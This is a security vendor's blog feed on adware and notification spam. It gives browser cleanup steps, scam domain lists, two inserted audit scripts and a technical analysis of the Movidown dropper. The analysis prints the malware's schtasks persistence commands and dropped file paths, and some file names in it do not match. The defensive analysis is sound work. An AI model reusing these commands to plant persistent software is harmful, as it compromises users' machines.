Adware – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Wed, 09 Jul 2025 02:49:21 +0000

How to Stop Fake McAfee Pop-ups from Windows (For Real)
https://gridinsoft.com/blogs/how-to-remove-mcafee-popups/
Mon, 28 Apr 2025 08:47:57 +0000
If you’re seeing fake McAfee pop-ups appearing on your screen, don’t panic. Your browser keeps showing security alerts claiming to be from McAfee. Pop-ups say your subscription expired or that viruses were found. You might see notifications about critical security threats. This guide will help you remove these fake alerts completely. Follow these step-by-step instructions to eliminate these scareware pop-ups. We’ll start with methods you can try right now.

Threat Name: Fake McAfee Pop-ups / McAfee Notification Spam
Threat Type: Browser Notification Spam, Scareware, Fake Security Alerts
Distribution Method: Malicious websites, browser notification permissions, affiliate marketing
Primary Goal: Generate affiliate commissions, promote unwanted software, collect personal information
Common Sources: Suspicious domains (soft-protect.info, etc.), compromised websites, malicious ads
Potential Damage: Unwanted software installation, financial loss, privacy compromise, system infection
Risk Level: Medium – Can lead to malware installation and financial loss

What Are Fake McAfee Pop-ups?

These aren’t real McAfee alerts. They’re browser notification spam wearing a McAfee disguise. Some website tricked you into allowing notifications. Now they’re flooding you with fake security warnings. The scammers want your money or personal information, similar to tactics used in common online scams.

McAfee Fake Notice
Look at the domain: “soft-protect.info” – not McAfee’s real website. This tells you it’s fake.

Click on these notifications and you’ll land on scary websites. “Your computer has 13 viruses!” they scream. They hope you’ll panic and download their junk software. These tactics are identical to other fake virus alert schemes we’ve seen.

Sometimes these scams redirect to real McAfee pages. That doesn’t make them legit. They’re affiliate marketers using dirty tricks. They get paid when you buy something. Similar deceptive methods appear in tech support scams targeting users worldwide.

Could It Be Real McAfee Software?

Rarely. Real McAfee notifications come from official domains. They show up in your system tray, not as browser pop-ups. If you never installed McAfee but see these alerts, they’re definitely fake. This mirrors how Norton subscription scams target people who don’t use Norton.

Manual Removal Steps

You can stop these fake McAfee pop-ups yourself. The key is finding where they come from and cutting off their access. Most come through browser notifications or malicious extensions. These manual methods are effective against various browser notification spam techniques.

Step 1: Remove Notification Permissions in Chrome

Chrome’s notification system is the main culprit. You need to revoke permissions from suspicious websites.

  1. Open Chrome and click the three dots in the top-right corner
  2. Select “Settings” then go to “Privacy and security”
  3. Click “Site Settings” then find “Notifications”
  4. Look through the list of allowed websites
  5. Remove any suspicious domains like “soft-protect.info” or sites you don’t recognize

Chrome Privacy and Security Settings

You can also type “chrome://settings/content/notifications” in your address bar for quick access.
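As an added example (not code from the original post), the script below reads the same list Step 1 walks through, but from Chrome's Preferences file, and flags hosts matching the scam domains named in this feed. The Preferences layout (profile.content_settings.exceptions.notifications, keyed "origin,*", with "setting" 1 = Allow) and the sample file are assumptions; the script only reports, and revoking is still done on the notifications settings page.

```python
import json
import fnmatch
from urllib.parse import urlsplit

# Constructed sample of the one slice of a Chrome "Preferences" profile file that
# stores per-site notification decisions (assumed layout: profile.content_settings
# .exceptions.notifications, keyed by "origin,*", with "setting" 1 = Allow, 2 = Block).
# A real file holds many more keys; the two scam hosts are the ones named in this feed.
SAMPLE_PREFERENCES = json.dumps({
    "profile": {
        "content_settings": {
            "exceptions": {
                "notifications": {
                    "https://soft-protect.info:443,*": {"setting": 1},
                    "https://sec-tl-129-a.buzz:443,*": {"setting": 1},
                    "https://mail.example.com:443,*": {"setting": 1},
                    "https://news.example.org:443,*": {"setting": 2},
                }
            }
        }
    }
})

ALLOW = 1  # assumed ContentSetting value for "Allow"

# Host patterns taken from this feed: the fake-McAfee domain and the *-tl-*.buzz
# notification-spam families (Sec-tl, First-tl, Check-tl-ver).
SUSPICIOUS_PATTERNS = ["soft-protect.info", "*-tl-*.buzz"]


def host_of(exception_key: str) -> str:
    """Turn an exception key such as 'https://host:443,*' into its bare hostname."""
    primary = exception_key.split(",", 1)[0]
    return urlsplit(primary).hostname or primary


def allowed_notification_hosts(preferences_json: str) -> list:
    """Return the hosts that are currently permitted to push notifications."""
    prefs = json.loads(preferences_json)
    exceptions = (prefs.get("profile", {})
                       .get("content_settings", {})
                       .get("exceptions", {})
                       .get("notifications", {}))
    return [host_of(key) for key, value in exceptions.items()
            if value.get("setting") == ALLOW]


def flag_suspicious(hosts, patterns=SUSPICIOUS_PATTERNS) -> list:
    """Keep only hosts matching a known scam pattern (case-insensitive glob match)."""
    return [h for h in hosts
            if any(fnmatch.fnmatch(h.lower(), p) for p in patterns)]


if __name__ == "__main__":
    allowed = allowed_notification_hosts(SAMPLE_PREFERENCES)
    print("Sites allowed to send notifications:", allowed)
    print("Review and revoke at chrome://settings/content/notifications:",
          flag_suspicious(allowed))
```

To run it against a real profile, replace SAMPLE_PREFERENCES with the contents of the Preferences file in the Chrome profile folder while Chrome is closed.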

Step 2: Check for Malicious Browser Extensions

Fake McAfee extensions might be causing these pop-ups. Check your installed extensions and remove anything suspicious.

  1. Click the three dots menu in Chrome
  2. Go to “More Tools” then “Extensions”
  3. Look for any McAfee-related extensions you didn’t install
  4. Remove extensions with suspicious names or recent install dates
  5. Restart Chrome after removing extensions

Chrome Extensions Menu

Step 3: Clear Browser Data

Clear your browsing data to remove any lingering notification permissions or cached malicious content. This step helps eliminate traces of phishing attempts and malicious website interactions.

  1. Press Ctrl+Shift+Delete in Chrome
  2. Select “All time” from the time range dropdown
  3. Check “Cookies and other site data” and “Cached images and files”
  4. Click “Clear data”
  5. Restart your browser

Step 4: Check Windows Startup Programs

Some fake McAfee pop-ups come from programs that start with Windows. Check your startup programs for anything suspicious. Malicious software often uses Windows startup processes to maintain persistence.

  1. Press Ctrl+Shift+Esc to open Task Manager
  2. Click the “Startup” tab
  3. Look for programs with names like “McAfee” that you didn’t install
  4. Right-click suspicious programs and select “Disable”
  5. Research unknown programs before disabling them

Step 5: Scan for Potentially Unwanted Programs

Check your installed programs list for anything you didn’t install. Look especially for programs installed recently.

  1. Open Windows Settings (Windows key + I)
  2. Go to “Apps” then “Apps & features”
  3. Sort by “Install date” to see recent installations
  4. Uninstall any suspicious programs or fake security software
  5. Be careful not to uninstall legitimate programs

Pay attention to programs that might be potentially unwanted applications bundled with other software.

Browser Cleanup

If manual steps didn’t work completely, use these comprehensive browser cleanup methods. Browser cleanup is essential when dealing with social media malware and similar persistent threats.

Remove Malicious Browser Extensions


Google Chrome

  1. Launch the Chrome browser.
  2. Click on the icon "Configure and Manage Google Chrome" ⇢ Additional Tools ⇢ Extensions.
  3. Click "Remove" next to the extension.

If you have an extension button on the browser toolbar, right-click it and select Remove from Chrome.

Mozilla Firefox

  1. Click the menu button, select Add-ons and Themes, and then click Extensions.
  2. Scroll through the extensions.
  3. Click on the … (three dots) icon for the extension you want to delete and select Delete.

Microsoft Edge

  1. Launch the Microsoft Edge browser.
  2. Click the three dots (…) menu in the top right corner.
  3. Select Extensions.
  4. Find the extension you want to remove and click Remove.
  5. Click Remove again to confirm.

Alternatively, you can type edge://extensions/ in the address bar to access the extensions page directly.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner.
  3. Select Extensions ⇢ Manage extensions.
  4. Find the extension you want to remove and click the X button next to it.
  5. Click Remove to confirm.

Alternatively, you can type opera://extensions/ in the address bar to access the extensions page directly.

Reset Your Browser Settings

If fake McAfee pop-ups persist, reset your browser to default settings:


Google Chrome

  1. Click the three vertical dots (…) in the top right corner and choose Settings.
  2. Choose Reset and clean up, then Restore settings to their original defaults.
  3. Click Reset settings.

Mozilla Firefox

  1. In the upper right corner, click the three-line icon and choose Help.
  2. Choose More Troubleshooting Information.
  3. Choose Refresh Firefox…, then Refresh Firefox.

Microsoft Edge

  1. Click the three vertical dots (…).
  2. Choose Settings.
  3. Click Reset Settings, then click Restore settings to their default values.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner and select Settings.
  3. Scroll down to the Advanced section in the left sidebar and click Reset and clean up.
  4. Click Restore settings to their original defaults.
  5. Click Reset settings to confirm.

Alternatively, you can type opera://settings/reset in the address bar to access reset options directly.

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be time-consuming and tricky. For faster, more reliable results, GridinSoft Anti-Malware offers automatic detection and removal of fake McAfee pop-ups and related threats. Professional anti-malware software finds hidden components you might miss.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Understanding the Broader Scam Network

Fake McAfee pop-ups are part of a larger scam ecosystem. Criminals use these alerts as gateways to more elaborate schemes. They might lead to Microsoft account locked scams or phantom hacker scams targeting vulnerable users.

The notification spam technique isn’t unique to McAfee impersonation. Similar methods promote fake CAPTCHA sites, cryptocurrency recovery services, and various fraudulent schemes. These tactics are also common in QR code phishing attacks and cryptocurrency giveaway scams.

Prevention Tips

Stop fake McAfee pop-ups before they start with these simple prevention strategies.

Key Prevention Tips:

  • Never click “Allow” on notification requests from unknown websites
  • Keep your browser updated with latest security patches
  • Avoid clicking suspicious ads or links
  • Don’t download software from pop-up advertisements
  • Use reputable antivirus software for real protection

Be extra careful about websites using urgent language or claiming immediate action is required. These are common tactics in verification scams designed to bypass your critical thinking. Watch out for fake error message scams that use similar psychological pressure.

If you need real security software, research your options carefully. Don’t respond to scary pop-ups. Legitimate companies like Windows Defender don’t use aggressive pop-up tactics.

Frequently Asked Questions

How can I tell if a McAfee pop-up is fake?

Check the website domain in your browser’s address bar. Real McAfee notifications come from official McAfee domains (mcafee.com). Fake alerts often come from suspicious domains like “soft-protect.info” or other unrelated websites. Real McAfee software notifications typically appear in your system tray, not as browser pop-ups.

Why do I get McAfee pop-ups if I don’t have McAfee installed?

These are fake notifications from websites that got permission to send you browser notifications. Scammers use McAfee’s name recognition to make their fake alerts seem legitimate. The pop-ups aren’t from McAfee software but from malicious websites abusing browser notification permissions.

Can clicking fake McAfee pop-ups harm my computer?

Yes, clicking fake McAfee pop-ups can lead to malware installation, unwanted software downloads, or redirect you to phishing sites designed to steal personal information. These pop-ups often promote fake antivirus software or lead to scams that can result in financial loss and system compromise.

How do I permanently stop all McAfee pop-ups?

For fake pop-ups: Clear your browser’s notification permissions by going to Settings > Privacy and Security > Site Settings > Notifications, then remove suspicious domains. For legitimate McAfee software: Open your McAfee program, go to Settings, and adjust notification preferences to reduce or disable alerts.

What should I do if I already clicked on a fake McAfee pop-up?

Don’t panic, but take immediate action. Close the browser tab, run a full system scan with reputable antivirus software, check for recently installed suspicious programs, and monitor your accounts for unusual activity. If you provided personal information, consider changing passwords and monitoring your financial accounts.

Are there legitimate McAfee renewal notifications?

Yes, but legitimate renewal notifications typically come via email to your registered account or appear within the actual McAfee software interface. They won’t appear as random browser pop-ups from unknown websites. Always verify renewal notices by logging into your McAfee account directly through their official website.

How can I report fake McAfee pop-ups?

You can report fake McAfee notifications to McAfee directly through their official website, report the malicious domains to your browser’s security team (Chrome, Firefox, etc.), and consider reporting to the Federal Trade Commission (FTC) if you’re in the United States. This helps protect other users from similar scams.

Why do fake McAfee pop-ups keep coming back?

Persistent fake pop-ups usually indicate deeper system infection or incomplete removal. You might have bundled software or browser hijackers that need specialized removal tools. Try the manual steps above or use professional anti-malware software for thorough cleanup.

Bottom Line

Most McAfee pop-ups aren’t from McAfee at all. They’re from scammers using fake browser notifications to trick you. By removing notification permissions and checking for malicious extensions, you can stop these annoying alerts for good.

Remember that legitimate security companies don’t use scary pop-up tactics. If you need real antivirus protection, research your options instead of responding to pushy alerts. For additional protection against online threats, learn about social media scams, delivery scam texts, and seasonal shopping scams to stay informed about evolving threat landscapes.

Sec-tl Pop-Up Virus
https://gridinsoft.com/blogs/sec-tl-pop-up-virus/
Thu, 03 Oct 2024 19:11:40 +0000
Sec-tl pop-up ads are malicious push notifications that parasitize legitimate browser functionality. The fraudulent actors behind this chain of websites earn money by showing hundreds of ads in this way. And those are not just regular ads: it is common to see scams and phishing sites among them. Let me explain how this scam works, how you can stop it, and how to avoid such troubles in the future.

Sec-tl Pop-Up Notifications Overview

Push notifications from the Sec-tl series of websites are a fraudulent campaign that aims at earning money through pay-per-view ads. The con actors behind it set these sites to send dozens of notifications each minute, each containing some promotion. It works by abusing the legitimate push notification functionality of browsers, with the user tricked into allowing notifications from these sites.

Example of a Sec-tl site that requests the user to allow notifications

Typically, when users get to any of the Sec-tl sites, they see a demand “to prove that you are not a robot”. To do this, the site asks to enable notifications. This, eventually, is where it all starts. You can open such a page dozens of times, and that will not impact you or your system unless you press the “Allow” button.

Domains involved in the scam

URL | Registered | Scan report
Sec-tl-129-a.buzz | 2024-09-12 | Report
Sec-tl-129-b.buzz | 2024-09-12 | Report
Sec-tl-129-c.buzz | 2024-09-12 | Report
Sec-tl-129-d.buzz | 2024-09-12 | Report
Sec-tl-129-e.buzz | 2024-09-12 | Report

You can conduct your own investigation using our Inspector API by performing a search with the key “Sec-tl” here.

But let’s take one step back, to the way one gets to these websites. Similar to quite a few other scam campaigns, these sites gain visitors through redirections from other sites. I am not talking about regular external links – no, the fraudsters rely on random redirects that happen as you click on any element of a website.

As far as my research shows, Sec-tl sites mainly get redirects from sites that offer pirated movies and TV series. In particular, there are two sites to stay away from – moviesnation[.]org and moviesearch[.]org.

By just going to the root domain, you will see either a 404 error or a hosting boilerplate message saying that the domain is for sale. All the fraudulent activity happens at a much deeper level, with several URL parameters generated during the redirect. And, as you can see from the list above, the fraudsters use quite a few domains, meaning that each can target different countries or show different ads in notifications.

Are Sec-tl Push Notifications Dangerous?

Yes, they are. Aside from being just annoying, as any excessive advertising is, their contents are not filtered in any way. What’s more, the scammers apparently cooperate with other fraudsters in that matter, so quite a lot of push notifications lead to the download page of some sketchy software, a shopping scam site, or similar. There can also be promotions of gambling or betting sites, or low-trust dating platforms. All of the latter pose less danger than phishing or scams but can create headaches nonetheless.

It is also worth saying that these pop-ups pose no threat unless you click them and consequently interact with the contents of the site. And it is tricky at times: images in notifications can contain a “cross”, suggesting you click it to close the ad. Instead, since you have in fact clicked the main content of the promotion, this throws you to the promoted website.

As for direct dangers to the system, they are not too high unless you have interacted with the ads. However, there are a lot of cases where active adware was opening such notification spam pages, so the user does not even need to visit a dodgy website to trigger a redirect. That’s why an anti-malware scan is a recommended step even after the manual removal of the pop-ups.

How to remove Sec-tl pop-up spam?

Since the main source of the pop-ups is the permission to send notifications granted to a certain website, it is possible to remove it manually. To do this, go to your browser settings and type “Notification settings” in the search bar. I will show this using Google Chrome as the example, but the steps should be similar for the rest of the browsers.

Then, it is time for the second step – an anti-malware scan. As I said, there is a risk of unwanted pop-ups appearing as the result of adware activity. Removing it manually is a much, much more complicated task than removing permissions for notifications, so an automated scan will be more convenient. For this purpose, I recommend GridinSoft Anti-Malware.

Sec-tl Removal Guide

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

First-tl Pop-Up Virus
https://gridinsoft.com/blogs/first-tl-pop-up-virus/
Tue, 01 Oct 2024 01:57:07 +0000
First-tl pop-up ads are malicious push notifications (like those from the Sec-tl sites) that parasitize legitimate browser functionality. The fraudulent actors behind this chain of websites earn money by showing hundreds of ads in this way. And those are not just regular ads: it is common to see scams and phishing sites among them. Let me explain how this scam works, how you can stop it, and how to avoid such troubles in the future.

First-tl Pop-Up Notifications Overview

Push notifications from the First-tl series of websites are a fraudulent campaign that aims at earning money through pay-per-view ads. The con actors behind it set these sites to send dozens of notifications each minute, each containing some promotion. It works by abusing the legitimate push notification functionality of browsers, with the user tricked into allowing notifications from these sites.

Example of a First-tl site that requests the user to allow notifications

Typically, when users get to any of the First-tl sites, they see a demand “to prove that you are not a robot”. To do this, the site asks to enable notifications. This, eventually, is where it all starts. You can open such a page literally dozens of times, and that will have no impact on you or your system unless you press the “Allow” button.

Domains involved in the scam

URL | Registered | Scan report
First-tl-209-a.buzz | 2024-09-21 | 209-a
First-tl-209-b.buzz | 2024-09-21 | 209-b
First-tl-209-c.buzz | 2024-09-21 | 209-c
First-tl-259-a.buzz | 2024-09-26 | 259-a
First-tl-259-b.buzz | 2024-09-26 | 259-b
First-tl-259-c.buzz | 2024-09-26 | 259-c
First-tl-259-d.buzz | 2024-09-26 | 259-d
First-tl-259-e.buzz | 2024-09-26 | 259-e
First-tl-139-f.buzz | 2024-09-12 | Report

You can conduct your own investigation using our Inspector API by performing a search with the key “First-tl” here.

First-tl Notification – Example of scam virus alert

But let’s take one step back, to the way one gets to these websites. Similar to quite a few other scam campaigns, these sites gain visitors through redirections from other sites. I am not talking about regular external links – no, the fraudsters rely on random redirects that happen as you click on any element of a website.

As far as my research shows, First-tl sites mainly get redirects from sites that offer pirated movies and TV series. In particular, there are two sites to stay away from – moviesnation[.]org and moviesearch[.]org.

By just going to the root domain, you will see either a 404 error or a hosting boilerplate message saying that the domain is for sale. All the fraudulent activity happens at a much deeper level, with several URL parameters generated during the redirect. And, as you can see from the list above, the fraudsters use quite a few domains, meaning that each can target different countries or show different ads in notifications.

Are First-tl Push Notifications Dangerous?

Example of McAfee Scam from First-TL sites

Yes, they are. Aside from being just annoying, as any excessive advertising is, their contents are not filtered in any way. What’s more, the scammers apparently cooperate with other fraudsters in that matter, so quite a lot of push notifications lead to the download page of some sketchy software, a shopping scam site, or similar. There can also be promotions of gambling or betting sites, or low-trust dating platforms. All of the latter pose less danger than phishing or scams but can create headaches nonetheless.

It is also worth saying that these pop-ups pose no threat unless you click them and consequently interact with the contents of the site. And it is tricky at times: images in notifications can contain a “cross”, suggesting you click it to close the ad. Instead, since you have in fact clicked the main content of the promotion, this throws you to the promoted website.

As for direct dangers to the system, they are not too high unless you have interacted with the ads. However, there are a lot of cases where active adware was opening such notification spam pages, so the user does not even need to visit a dodgy website to trigger a redirect. That’s why an anti-malware scan is a recommended step even after the manual removal of the pop-ups.

How to remove First-tl pop-up spam?

Since the main source of the pop-ups is the permission to send notifications granted to a certain website, it is possible to remove it manually. To do this, go to your browser settings and type “Notification settings” in the search bar. I will show this using Google Chrome as the example, but the steps should be similar for the rest of the browsers.

Then, it is time for the second step – an anti-malware scan. As I said, there is a risk of unwanted pop-ups appearing as the result of adware activity. Removing it manually is a much, much more complicated task than removing permissions for notifications, so an automated scan will be more convenient. For this purpose, I recommend GridinSoft Anti-Malware.

First-tl Removal Guide

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Check-tl-ver Pop-Up Virus
https://gridinsoft.com/blogs/check-tl-ver-pop-up-virus/
Mon, 02 Sep 2024 15:51:02 +0000
Analysis shows a hike in the number of malicious pop-ups that come from Check-tl-ver websites. It is a rather common strategy of aggressive marketing that aims to spam users after forcing them to allow sending notifications from the aforementioned websites. Let’s figure out what this scam is, and how to stop Check-tl-ver pop-ups.

What are check-tl-version pop-up notifications?

Pop-up notifications from Check-tl-version sites are a spam campaign that aims to earn money from pay-per-view and pay-per-click advertisements. There is an entire chain of such sites, created by the same group of cybercriminals and existing for the same purpose. The fraudsters behind all this lure people into pressing the “Allow notifications” button that appears as soon as one enters the site. This demand may be framed as a form of captcha, DDoS protection, or the like.

List of domains involved in a scam

URL | Registered | Scan report
Check-tl-ver-u99-a.buzz | 2024-10-09 | Report
Check-tl-ver-u99-b.buzz | 2024-10-09 | Report
Check-tl-ver-u99-c.buzz | 2024-10-09 | Report
Check-tl-ver-u99-d.buzz | 2024-10-09 | Report
Check-tl-ver-u99-e.buzz | 2024-10-09 | Report
Check-tl-ver-u99-f.buzz | 2024-10-09 | Report
Check-tl-ver-u99-g.buzz | 2024-10-09 | Report

One particular source of redirections to check-tl-version sites is browsing sites with illegal or explicit content. Websites that host pirated movies or games, adult sites – clicking anything on such pages may trigger a redirection to the scam site that will ask you to allow notifications. That twisted form of cooperation is what makes me warn people against using such sources of software and movies.

Example of the “Allow notifications” page

An interesting thing about the pop-up spam sites is that they work only after the redirection. Simple checks show that opening the scam page requires a correct link. Visiting the root domain, without the additional parameters in the URL, will return either a 404 error or a boilerplate page that says the domain is for sale.

How dangerous are Check-tl-version pop-ups?

Once the user allows notifications from one of the check-tl-version websites, it starts bombarding them with pop-ups. These notifications appear in the system tray, offering gambling or adult sites, or trying to scare the user by saying the system is infected. Clicking on a pop-up will send the user to a website with some rather questionable content. It is also pretty common to see phishing pages promoted in this way, which is the main concern with this pop-up spam.

Example of a fake antivirus warning that the check-tl-ver site can send

Another angle of the problem is the offer to install some questionable software to solve non-existent problems. You might encounter a so-called Microsoft tech support scam page or a site that pretends to scan your PC, falsely reporting that there are hundreds of malicious programs running at the moment. To make it harder for the user to quit, scammers make these sites open in a full-screen mode, so there is no visible way out. Of course, unless someone presses the Escape button.

But scams and phishing aside, the key issue with all this is the fact that constant pop-ups are extremely annoying. Because of the way Windows shows notifications, they will appear on top of any app that is currently running. It’s simply hard to concentrate on your task when you constantly hear and see banners popping up one after another. And, well, it will be quite an embarrassing moment when your boss walks by while there is a pop-up with hot girls around you on the screen.

How to remove Check-tl-version pop-ups?

It is possible to remove the pop-up source manually through the browser interface. In Chrome, open chrome://settings/content/notifications; in Edge, edge://settings/content/notifications; in Firefox, go to Settings > Privacy & Security > Permissions > Notifications > Settings. Remove every site in the "Allowed" list that you do not recognize, then restart the browser to apply the changes.
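For a more systematic check, the same "Allowed" list can be audited from the profile on disk. The script below is an added example, not GridinSoft's code: Chromium-based browsers (Chrome, Edge) keep per-site notification decisions in the JSON "Preferences" file of the profile under profile.content_settings.exceptions.notifications, where a setting of 1 means allow and 2 means block. The Preferences content, the hostnames (except soft-protect.info, which is named on this page) and the SUSPICIOUS_PATTERNS word list are constructed for the demo.

```python
"""Audit and revoke browser notification grants from a Chromium Preferences file.

Added example (not GridinSoft's code). The JSON subtree and the hostnames
below are constructed stand-ins for a real profile.
"""
import json
import re

ALLOW, BLOCK = 1, 2  # Chromium content-setting values: 1 = allow, 2 = block

# Constructed stand-in for a real Preferences file (only the relevant subtree).
SAMPLE_PREFERENCES = json.dumps({
    "profile": {
        "content_settings": {
            "exceptions": {
                "notifications": {
                    "https://mail.example.com:443,*": {"setting": ALLOW},
                    "https://check-tl-ver-12-3.com:443,*": {"setting": ALLOW},
                    "https://news.example.org:443,*": {"setting": BLOCK},
                    "https://soft-protect.info:443,*": {"setting": ALLOW},
                }
            }
        }
    }
})

# Name fragments typical of notification-spam domains (assumption for the demo;
# seed this from your own observations).
SUSPICIOUS_PATTERNS = re.compile(r"check-tl-ver|protect|scan|virus|alert", re.I)


def notification_grants(preferences_json):
    """Return {origin: setting} for every site that has an explicit notification rule."""
    prefs = json.loads(preferences_json)
    rules = (prefs.get("profile", {}).get("content_settings", {})
                  .get("exceptions", {}).get("notifications", {}))
    grants = {}
    for pattern, rule in rules.items():
        # Chromium keys look like "https://host:443,*"; keep only the origin part.
        origin = pattern.split(",")[0]
        grants[origin] = rule.get("setting")
    return grants


def allowed_origins(preferences_json):
    """Origins currently allowed to push notifications, sorted for stable output."""
    return sorted(o for o, s in notification_grants(preferences_json).items() if s == ALLOW)


def suspicious_origins(preferences_json):
    """Allowed origins whose name matches the spam-site patterns."""
    return [o for o in allowed_origins(preferences_json) if SUSPICIOUS_PATTERNS.search(o)]


def revoke(preferences_json, origins):
    """Return a new Preferences JSON string with the given origins switched to BLOCK."""
    prefs = json.loads(preferences_json)
    rules = prefs["profile"]["content_settings"]["exceptions"]["notifications"]
    for pattern in rules:
        if pattern.split(",")[0] in origins:
            rules[pattern]["setting"] = BLOCK
    return json.dumps(prefs)


if __name__ == "__main__":
    bad = suspicious_origins(SAMPLE_PREFERENCES)
    print("allowed now:   ", allowed_origins(SAMPLE_PREFERENCES))
    print("suspicious:    ", bad)
    cleaned = revoke(SAMPLE_PREFERENCES, bad)
    print("allowed after: ", allowed_origins(cleaned))
```

Run it against a copy of the profile's Preferences file only while the browser is closed; for the actual cleanup the settings UI is the safer route, and the script is meant to tell you quickly which of a user's granted origins deserve a second look.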

There is also a second step: malware removal. The check-tl-version pop-ups may be caused by adware or a browser hijacker, both of which commonly trigger redirections and alter browser settings to suit their needs. For that reason, I recommend scanning the system with GridinSoft Anti-Malware: it will show whether there is something malicious on your device or not. Download it, install it and run a scan as described below; the Full scan covers the locations where such malware typically keeps its files.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post Check-tl-ver Pop-Up Virus appeared first on Gridinsoft Blog.

Movidown Unwanted Application https://gridinsoft.com/blogs/movidown-pua/ https://gridinsoft.com/blogs/movidown-pua/#respond Tue, 20 Aug 2024 14:18:21 +0000 https://gridinsoft.com/blogs/?p=26344 Movidown is an Unwanted Application that initially mimics a utility for controlling fan speed. However, beneath this shell, it has the capabilities of a dropper malware, which it right away uses to deploy browser hijackers. This functionality, together with the deep access to the system, creates potential risks for much more severe malware to get […]

The post Movidown Unwanted Application appeared first on Gridinsoft Blog.

Movidown is an Unwanted Application that presents itself as a utility for controlling fan speed. Beneath that shell, however, it has the capabilities of dropper malware, which it immediately uses to deploy browser hijackers. This functionality, combined with the deep system access a fan-control tool legitimately needs, creates the potential for far more severe malware to get into the system.

Movidown Overview

Movidown is a potentially unwanted application (PUA) that markets itself as a utility for controlling fan speeds. But when something gets 54/74 detections on VirusTotal, you know there is more to the story. In reality, this utility has a darker side: it primarily functions as a loader for browser hijackers and adware. Movidown typically gets onto the computer without the user's explicit consent, often through deceptive methods such as installers with hidden add-ons, misleading ads, or links on dubious websites.

VirusTotal screenshot
Movidown detections on VirusTotal

Once installed, Movidown does more than adjust fan speeds as advertised. It collects basic system information (fingerprinting) and alters browser settings. While it isn't a virus in the traditional sense, it will disrupt the browsing experience and create phishing risks. Among other things, it can lead to frequent redirects to dangerous or malicious sites, including phishing pages, which in turn may attempt to steal personal information or trick the user into downloading actual malware.

Technical Analysis

Let's have a closer look at how Movidown behaves on a compromised system to better understand its nature. As mentioned earlier, it is a utility for controlling fan speeds, so some of its actions within the system might seem logical. For instance, the first thing it does after launching is check the system's hardware and configuration for signs of a virtual environment. Malicious programs often do this check, though it is also normal for hardware management utilities. Movidown checks the following system locations:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir

This isn't an exhaustive list, and such checks can serve both legitimate and malicious purposes; a utility that needs low-level hardware access has reasons to query its environment. The next set of checks is more concerning, as the program also inspects Microsoft Defender's settings and components:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll

Payload Delivery

Unlike a typical dropper, this unwanted app follows a slightly different scenario. Normally a dropper connects to a command server, fetches the current configuration, and only then downloads the payload. Movidown instead acts immediately upon launch: it appears to carry its configuration embedded in the binary, so the malicious actions happen without any additional steps. It writes a couple of randomly named files to different folders, including C:\ProgramData, a directory that is hidden by default.

C:\ProgramData\jewkkwnf\jewkkwnf.exe
%SAMPLEPATH%\66b9e7f54cf7b_pro.exe

Here, ExtreamFanV6.exe is the utility itself (the name under which it registers in the Run key shown below), while jewkkwnf.exe is the unwanted software: a browser hijacker with adware components. Although this payload is not fully-fledged malware, technically Movidown could deliver any type of malicious software.

Establishing Persistence

The next step is establishing persistence for both the unwanted software and the payload it has downloaded. For that purpose it adds itself to startup through a Run key and registers the payload with Task Scheduler. It also places copies of its files in several directories across the disk.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV6
schtasks /create /f /RU "" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
schtasks /create /f /RU "" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
